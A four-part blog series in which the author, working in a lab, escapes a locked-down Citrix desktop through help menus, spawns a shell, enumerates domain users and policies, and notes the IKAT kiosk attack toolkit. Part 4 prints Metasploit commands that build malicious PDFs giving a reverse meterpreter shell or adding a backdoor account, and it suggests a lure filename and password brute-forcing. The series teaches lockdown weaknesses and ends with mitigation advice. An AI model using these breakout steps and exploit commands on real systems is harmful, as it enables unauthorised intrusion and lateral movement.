I've worked with Citrix for a little while now and I'm really trying to spend a little more of my free time with it instead this security stuff, but it's really hard because the security stuff is just so much fun. Well I thought I would combine the two, so I set up a small Citrix farm in a lab and now i'll see how many ways I can abuse the farm from an Evil Bob perspective. I'm going to start basic with a poorly secured farm, abuse that a little, then tighten it up a bit and abuse it some more.
Let's just see how it goes.
First of all lets lay out my goal. I want to break out of the given program/environment, have a look around and see what I can do that I'm not supposed to. In later posts I'll show the very worst that can happen but for now I'll just have a little fun.
First I log into Citrix as a restricted user and I can see that I only have 2 published programs. Notepad and a Desktop. I'll address Notepad in this post.
Well instead of Notepad I might like to browse the web, good job I can go to the help menu and right click on the top left of the toolbar then isn't it.
And with the power of a "Jump to URL" ......
And there we have a browser.
But what if I want to browse the Citrix servers hard drive? Surely I need Windows Explorer. Of course not. i just Jump to C:\Windows\System32
And what's that I see? cmd.exe
So from a published application like Notepad we got a shell in well under a couple of minutes. We could use the shell to further enumerate the network, launch programs, map shares, anything really. Oh, and we had a browser that we could use to download tools, pop the box from a downloaded exploit, browse to a Meterpreter listener, I'm sure you get the point.
So this one was easy, next i'm going to start applying policies to lock the Citrix server down and see what fun can be had then.
Stay tuned.
PART 2
So after my previous post I received a comment that a reader would be having another look at the security of his Citrix farm. This is exactly the type of thing I hoped to achieve when set out blogging so now I'm a happy nerdy blogger.
From there I can hop into the file system.
But it won't let me browse. Thats a bugger!
Well not all is lost because thanks to yet another help menu we can get to some pretty useful info and tools.
Bingo!
And these tools can be used to do alot of our work for us.
And if you ask for a shell, Windows will happily give you one.
And now we can browse the local drives and the network.
But wait, there's more to come..........
PART 3
So in the parts 1 & 2 I have shown that citrix servers with varying degrees of security have weaknesses that can be exploited to gain access to parts of the operating system that may be useful to an attacker or mischievous user. I also hinted at how web access could be misused to provide the attacker with additional tools. Here I'll quickly demonstrate an example of just one site hosting such tools.
A few months ago Patrick Grey on the brilliant Risky Buisness podcast interview Paul Craig. Paul talked about a set of tools he had developed for exploiting Kiosks, the IKAT (Internet Kiosk Attack Tool) tool. Well I figured that IKAT would be perfect for this blog post. Although the Citrix server isn't necessarily a kiosk, it is a system that provides a restricted interface that with a little fumbling around (see parts 1 & 2 of this series) you might be able to gain access to the web.
Once you have web access you could browse to the IKAT site and use the tools to have your wicked way with the poor Citrix server. Well what if you have restricted internet access and the IKAT site is on a known list of hacker sites and is blocked? Well thanks to Paul making the toolkit available you can host your own using IKAT Portable.
Anyway, heres just a few things that IKAT can do for you.
As you can see in the screenshot below, the Save and Save As dialogue boxes have been disabled.
Using IKAT getting to these options isn't difficult at all.
IKAT can also provide details on the host Citrix Server which might be of use for a more targeted attack.
Or you can download and launch a shell from IKAT's binary tools section...
and get even more information using a built in tool such as Systeminfo.
IKAT can do plenty more than I have demonstrated here and I encourage people to take a look at Paul's site at http://ikat.ha.cked.net
PART 4
In this post I’ll be working against a pretty restricted remote desktop. I have once again locked down the desktop to the degree that it’s pretty unusable. I have notepad and I.E available to me, and I.E is apparently locked to the company homepage.
My goal is to bypass the restrictions and perform a little network enumeration, hopefully using the server for my own evil intentions rather than what it is intended for.
I start off by checking out the website that I can get to, looking for links out to the internet. Unfortunately I don’t find anything too useful there. It’s all very web 1.0. The admin has removed the address bar and nearly all the menu options. Most of what I would normally use to extend my reach into the server has been restricted and just hit’s me with a Restrictions dialogue window.
I carry on looking for chinks in the amour and start to find a few things that may have been missed in the group policy. What you have to remember is that there are thousands of settings in the group policies and if they are not set up properly a seemingly irrelevant setting may lead to something useful to the attacker.
Here I see the Folders option has been left available.
And this allows me to go on to browse a list of available hosts on the network. What use is that you say?
Well it gives me potential targets which may come in handy in later phases of my attack. Also if I start to see computers called Test-Server or Dev-Server I might want to take a closer look at them in particular.
I also see that the Print menu option has been left available.
Again, because this hasn’t been restricted I can use this to my advantage. Even though the admin has removed the help from the menus in Notepad and I.E lucky for me Microsoft provide plenty of links to help elsewhere in the OS.
And again I can use links in the help pages to get back to a page which does give me the address bar that I want.
And if I can browse out from there I can get to my tools.
But what tools do I really need? Well at the moment I should really find out a little more about the network so when I do download the tools I get just the ones I need to make my job of erasing tracks that little bit easier.
Even though the admin has taken away all the drive mappings as long as I can find somewhere writable I can easily create a batch file to launch a command shell with notepad. Once I have my shell things get even more interesting.
And because I can browse about a bit easier I can run my batch file and launch the shell.
Oh that’s handy, using the net command I can see how I need to tailor any brute-force attempts to avoid locking out accounts. As we have seen, so far I have been able to look at a list of available computers and the password policy.
I could use “net user /domain >userlist.txt ” to get myself a list of accounts on the domain. I know that I can run commands from the command line and create and execute batch files so from there I can write a simple FOR loop to bring a little password brute-forcing to the party. But for now let’s not get carried away and carry on with our Citrix fun.
So I have a list of users, computers, security settings, what would be nice would be software versions. Well I can easily see what the Notepad and I.E versions are. From my handy shell I can even use the “SystemInfo” command to see what hotfixes are applied.
The thing is, because this server is in a particular hostile environment it “should” be patched to the hilt. What would be nice would be to see what third-party software is installed. Of course we can’t browse the C: drive through windows, but we can through DOS.
And what do we have here? Adobe Acrobat Reader. Even though it’s been removed from my menus I can launch it through the shell and check it’s version.
Oh look at that. Version 8.1.2. I have a little Metasploit goodness for that.
Maybe I could create a pdf that will connect back to a listener and give you a meterpreter session which will use the citrix host as a pivot point to through exploits at the softer targets:
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=SiteDirections.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=6666 E
Or knowing that it’s likely that the version of Acrobat is the same elsewhere in the organisation, tailor a pdf to create an account on this or another system. And give it an enticing name that most (male) sys admins will struggle to ignore.
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=BritneyDoesParis.pdf payload=windows/adduser user=System-Backup pass=Password123 E
Anyway, there I am going of topic again, back to my remote desktop.
Assuming that we don’t find a vulnerable third party apps, what else can I do from this restricted user locked down to the hilt desktop? Well we all know how useful MMC’s are, from the printing help menu that I got to earlier I can search for one and what do you know?
Lunch the MMC from the handy shortcut that’s provided, add a few snap-ins here and there and my restricted user Bob is starting to feel a little more comfortable in his “locked down” desktop.
Not many admins would be comfortable with restricted users having access to this level of information I imagine.
Speaking of desktops…
oh my......
The possibilities are endless.
So that’s all for this post. I just want to finish by saying that these weaknesses can be mitigated by strong group policies and restrictions, but in my opinion the admin who creates these does need to think like the attacker and use multiple layers of defence. Group policies need to be coupled with a good patching regime (OS and 3rd party) and a strong degree of least privilege. It’s also important to remember that every single system on the network is important, not just the servers.
If you got this far thanks for reading.
Here’s just a few useful keyboard shortcuts that might help you in your Citrix/Remote Desktop adventures.
Windows Shortcuts
SHIFT+F1 = Local Task List
SHIFT+F2 = Toggle Title Bar
SHIFT+F3 =Close Remote Application
CTRL+F1 = Displays Windows Security Desktop – Ctrl+Alt+Del
CTRL+F2 = Remote Task List
CTRL+F3 = Remote Task Manager –Ctrl+Shift+ESC
ALT+F2 = Cycle through programs
ALT+PLUS = Alt+TAB
ALT+MINUS = ALT+SHIFT+TAB
I.E Shortcuts
Ctrl + h = View History
Ctrl +i = View Favorites
Ctrl + t = New Tab (I.E 7)
Ctrl + n = New Window
Ctrl + o = Internet Address (browse feature)
Ctrl + n = New Browser
Ctrl + p = Print (to file)
Right Click (Shift + F10)
Save Image As
View Source
F1 = Help (and of the jump to URL as mentioned in Part 1)
